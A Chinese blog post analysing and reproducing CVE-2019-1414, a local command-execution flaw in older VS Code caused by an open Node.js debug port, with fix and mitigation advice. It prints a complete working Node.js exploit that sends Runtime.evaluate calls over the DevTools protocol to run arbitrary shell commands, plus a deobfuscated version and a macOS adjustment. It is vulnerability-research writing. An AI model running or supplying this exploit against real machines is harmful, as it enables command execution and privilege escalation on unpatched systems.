背景

​微软在2015年推出的跨平台开源编辑器Visual Studio Code(VS Code),凭借其开箱即用的便捷以及丰富的插件社区,迅速吸引了大批用户。在最新的PYPL IDE排行榜中,VS Code已位列第六,并且仍处于上升趋势。

​几个月前,国外安全研究员Tavis Ormandy发现并提交了VS Code中的一个本地命令执行漏洞(CVE-2019-1414),并于最近披露。1.39之前版本的vscode受此漏洞影响。

漏洞分析与复现

可以在这里找到老版本的vscode安装包,各个操作系统版本的都有,我们这里使用1.38 Mac版本进行演示。

打开下载的vscode。通过ps可以看到,vscode默认开启了一个nodejs调试端口(--inspect=13611)。

1
2
3
$ ps aux |grep inspect
ch               95536   0.0  0.7  4815292  56884   ??  S     9:59上午   0:03.49 /private/var/folders/s7/yz190r8s1q1c07_dbl4z40dm0000gn/T/AppTranslocation/8D63CA2B-3DB2-4150-AE36-59BC8B6475DB/d/Visual Studio Code.app/Contents/Frameworks/Code Helper.app/Contents/MacOS/Code Helper --nolazy --inspect=13611 /private/var/folders/s7/yz190r8s1q1c07_dbl4z40dm0000gn/T/AppTranslocation/8D63CA2B-3DB2-4150-AE36-59BC8B6475DB/d/Visual Studio Code.app/Contents/Resources/app/out/bootstrap-fork --type=extensionHost
ch               95748   0.0  0.0  4286472    840 s003  S+   10:42上午   0:00.01 grep --color=auto --exclude-dir=.bzr --exclude-dir=CVS --exclude-dir=.git --exclude-dir=.hg --exclude-dir=.svn inspect

我们可以通过api查看以下信息:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
$ curl http://127.0.0.1:13611/json
[ {
  "description": "node.js instance",
  "devtoolsFrontendUrl": "chrome-devtools://devtools/bundled/js_app.html?experiments=true&v8only=true&ws=127.0.0.1:13611/09d445a2-c4ad-4082-b4ab-36de37ff910f",
  "devtoolsFrontendUrlCompat": "chrome-devtools://devtools/bundled/inspector.html?experiments=true&v8only=true&ws=127.0.0.1:13611/09d445a2-c4ad-4082-b4ab-36de37ff910f",
  "faviconUrl": "https://nodejs.org/static/favicon.ico",
  "id": "09d445a2-c4ad-4082-b4ab-36de37ff910f",
  "title": "/private/var/folders/s7/yz190r8s1q1c07_dbl4z40dm0000gn/T/AppTranslocation/8D63CA2B-3DB2-4150-AE36-59BC8B6475DB/d/Visual Studio Code.app/Contents/Frameworks/Code Helper.app/Contents/MacOS/Code Helper[95536]",
  "type": "node",
  "url": "file://",
  "webSocketDebuggerUrl": "ws://127.0.0.1:13611/09d445a2-c4ad-4082-b4ab-36de37ff910f"
} ]

在chrome中直接打开这里devtoolsFrontendUrl指向的链接,就可以得到一个调试终端,可以在里面执行js指令。

image-20191105125403677

漏洞作者给出的poc如下:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
//poc.js
const fetch = require('node-fetch')
const WebSocket = require('ws')

function die (reason) {
  console.error(reason)
  process.exit(-1)
}

if (process.argv.length !== 5) {
  die('usage: node index.js <IP> <PORT> <COMMAND>')
}

const IP = process.argv[2]
const PORT = process.argv[3]
const COMMAND = process.argv[4]
const COMMAND_B64 = base64(COMMAND)

function base64 (data) {
  return Buffer.from(data).toString('base64')
}

async function getWsLink () {
  const res = await fetch(`http://${IP}:${PORT}/json`)
  const data = await res.json()
  return data[0].webSocketDebuggerUrl
}

async function main () {
  console.log(`[?] Getting webSocketDebuggerUrl from http://${IP}:${PORT}/json`)
  const wsLink = await getWsLink().catch(die)
  console.log(`[!] Found webSocketDebuggerUrl: ${wsLink}`)
  const socket = new WebSocket(wsLink)

  socket.onopen = async (event) => {
    console.log(`[?] Connection established to ${wsLink}`)
    socket.send(JSON.stringify({ id: 1, method: 'Runtime.enable' }))
    socket.send(JSON.stringify({
      id: 1,
      method: 'Runtime.evaluate',
      params: {
        expression: `spawn_sync = process.binding('spawn_sync'); normalizeSpawnArguments = function(c,b,a){if(Array.isArray(b)?b=b.slice(0):(a=b,b=[]),a===undefined&&(a={}),a=Object.assign({},a),a.shell){const g=[c].concat(b).join(' ');typeof a.shell==='string'?c=a.shell:c='/bin/sh',b=['-c',g];}typeof a.argv0==='string'?b.unshift(a.argv0):b.unshift(c);var d=a.env||process.env;var e=[];for(var f in d)e.push(f+'='+d[f]);return{file:c,args:b,options:a,envPairs:e};}`
      }
    }))

    socket.send(JSON.stringify({
      id: 2,
      method: 'Runtime.evaluate',
      params: {
        expression: `spawnSync = function(){var d=normalizeSpawnArguments.apply(null,arguments);var a=d.options;var c;if(a.file=d.file,a.args=d.args,a.envPairs=d.envPairs,a.stdio=[{type:'pipe',readable:!0,writable:!1},{type:'pipe',readable:!1,writable:!0},{type:'pipe',readable:!1,writable:!0}],a.input){var g=a.stdio[0]=util._extend({},a.stdio[0]);g.input=a.input;}for(c=0;c<a.stdio.length;c++){var e=a.stdio[c]&&a.stdio[c].input;if(e!=null){var f=a.stdio[c]=util._extend({},a.stdio[c]);isUint8Array(e)?f.input=e:f.input=Buffer.from(e,a.encoding);}}console.log(a);var b=spawn_sync.spawn(a);if(b.output&&a.encoding&&a.encoding!=='buffer')for(c=0;c<b.output.length;c++){if(!b.output[c])continue;b.output[c]=b.output[c].toString(a.encoding);}return b.stdout=b.output&&b.output[1],b.stderr=b.output&&b.output[2],b.error&&(b.error= b.error + 'spawnSync '+d.file,b.error.path=d.file,b.error.spawnargs=d.args.slice(1)),b;}`
      }
    }))

    console.log(`[!] Executing: ${COMMAND}`)
    socket.send(JSON.stringify({
      id: 3,
      method: 'Runtime.evaluate',
      params: {
        expression: `spawnSync('/bin/bash', ['-c', 'echo ${COMMAND_B64} | base64 -d | /bin/bash'])`
      }
    }))

    socket.close()
  }

  socket.onmessage = (event) => {
    // console.log(event)
  }

  socket.onclose = (event) => {
    // console.log(event)
    if (event.wasClean) {
      console.log('[?] Connection closed cleanly')
    } else {
      console.log('[?] Connection died')
    }
  }

  socket.onerror = (error) => {
    console.log(error)
  }
}

main()

执行命令是node poc.js [HOST] [PORT] [CMD]

1
2
node poc.js 127.0.0.1 13611 "pwd >/tmp/a"
cat /tmp/a

我用上面的命令尝试了几次都没有成功往/tmp/a中写入东西,于是开始着手分析poc代码。

getWsLink函数通过http://127.0.0.1:13611/json拿到webSocketDebuggerUrl。之后这个url被用来进行websocket连接。

1
2
3
4
5
async function getWsLink () {
  const res = await fetch(`http://${IP}:${PORT}/json`)
  const data = await res.json()
  return data[0].webSocketDebuggerUrl
}

建立连接之后发送了4个数据包,这种数据包的协议是Chrome DevTools Protocol,大致结构是这样的:

1
2
3
4
5
{
	id: 1,
  method: 'xxx',
  params: {} //可选
}

这种协议一般用来调试和优化Chromium, Chrome浏览器,查阅文档可以找到poc中使用的两种method。

image-20191105132516575

image-20191105132915626

可以看到两种method都在Runtime Domain分类下面,Runtime Domain把Javascript runtime暴露在远程连接中,且副作用持久化。Runtime.enable使能执行环境、Runtime.evaluate用来执行命令。

之后就需要知道发送的这几个expression里面有什么,把几个包中的expression展开、美化之后,可以看地更清晰一些:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
// id=2
spawn_sync = process.binding('spawn_sync');

normalizeSpawnArguments = function(c, b, a) { //解析参数,c:process, b:args, a:options
    if (Array.isArray(b) ? b = b.slice(0) : (a = b, b = []), a === undefined && (a = {}), a = Object.assign({}, a), a.shell) {
        const g = [c].concat(b).join(' ');
        typeof a.shell === 'string' ? c = a.shell : c = '/bin/sh', b = ['-c', g];
    }
    typeof a.argv0 === 'string' ? b.unshift(a.argv0) : b.unshift(c);
    var d = a.env || process.env;
    var e = [];
    for (var f in d) e.push(f + '=' + d[f]); //加入环境变量
    return {
        file: c,
        args: b,
        options: a,
        envPairs: e
    };
}

// id=3
spawnSync = function() { //主函数,用来执行命令
    var d = normalizeSpawnArguments.apply(null, arguments); 
    // arguments是函数的参数,https://developer.mozilla.org/zh-CN/docs/Web/JavaScript/Reference/Functions/arguments
    var a = d.options;
    var c;
    if (a.file = d.file, a.args = d.args, a.envPairs = d.envPairs, a.stdio = [{
            type: 'pipe',
            readable: !0,
            writable: !1
        }, {
            type: 'pipe',
            readable: !1,
            writable: !0
        }, {
            type: 'pipe',
            readable: !1,
            writable: !0
        }], a.input) {
        var g = a.stdio[0] = util._extend({}, a.stdio[0]);
        g.input = a.input;
    }
    for (c = 0; c < a.stdio.length; c++) {
        var e = a.stdio[c] && a.stdio[c].input;
        if (e != null) {
            var f = a.stdio[c] = util._extend({}, a.stdio[c]);
            isUint8Array(e) ? f.input = e : f.input = Buffer.from(e, a.encoding);
        }
    }
    var b = spawn_sync.spawn(a);
    if (b.output && a.encoding && a.encoding !== 'buffer')
        for (c = 0; c < b.output.length; c++) {
            if (!b.output[c]) continue;
            b.output[c] = b.output[c].toString(a.encoding);
        }
    return b.stdout = b.output && b.output[1], b.stderr = b.output && b.output[2], b.error && (b.error = b.error + 'spawnSync ' + d.file, b.error.path = d.file, b.error.spawnargs = d.args.slice(1)), b;
}

// 加的辅助调试内容
function base64(data) {
    return Buffer.from(data).toString('base64')
}
const COMMAND = process.argv[2]
const COMMAND_B64 = base64(COMMAND)

//id=4
spawnSync('/bin/bash', ['-c', `echo ${COMMAND_B64} | base64 -d | /bin/bash`])

id为2和3的表达式中定义了函数spawnSync,其中处理了诸如环境变量,输入输出这些细节。id为4的表达式中调用spawnSync来执行终端中传入的命令。

可以看到spawnSync函数返回了执行结果的stdout以及stderr,于是我修改了poc,把执行结果放入一个变量中,通过前面的文档可以知道,这种远程执行是有”副作用“的,所以在Chrome中的调试界面应该能打印这个变量,就可以看到报错信息。

image-20191105135602718

image-20191105135720029

原来是mac上base64工具的参数和linux上的不太一样,🤦‍♀️。

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
$ base64 --help
Usage:	base64 [-hvD] [-b num] [-i in_file] [-o out_file]
  -h, --help     display this message
  -D, --decode   decodes input
  -b, --break    break encoded string into num character lines
  -i, --input    input file (default: "-" for stdin)
  -o, --output   output file (default: "-" for stdout)
  
root@kali:~# base64 --help
Usage: base64 [OPTION]... [FILE]
Base64 encode or decode FILE, or standard input, to standard output.
With no FILE, or when FILE is -, read standard input.
Mandatory arguments to long options are mandatory for short options too.
  -d, --decode          decode data
  ........

把poc中的base64 -d换成base64 -D之后执行成功了。

image-20191105140552406

修复

此漏洞在1.39.1版本中得到修复,默认情况下不再开启调试端口。

image-20191105141538183

危害与安全建议

危害

​ 调试端口是暴露在本地的,所以不会有被远程攻击的危险,这一点降低了这个漏洞的危害程度。在渗透测试中,此漏洞可用来进行横向移动,可能会被用来进行bypass uac、提权等攻击行为。

安全建议

  1. 升级到最新版本
  2. 尽量避免在管理员权限下使用vscode

链接:

https://iwantmore.pizza/posts/cve-2019-1414.html

https://github.com/phra/inspector-exploiter

https://github.com/aslushnikov/getting-started-with-cdp/blob/master/README.md

https://chromedevtools.github.io/devtools-protocol/tot/Runtime

https://github.com/b1tg/inspector-exploiter/blob/master/debug-expressions.js

文章首发于安全客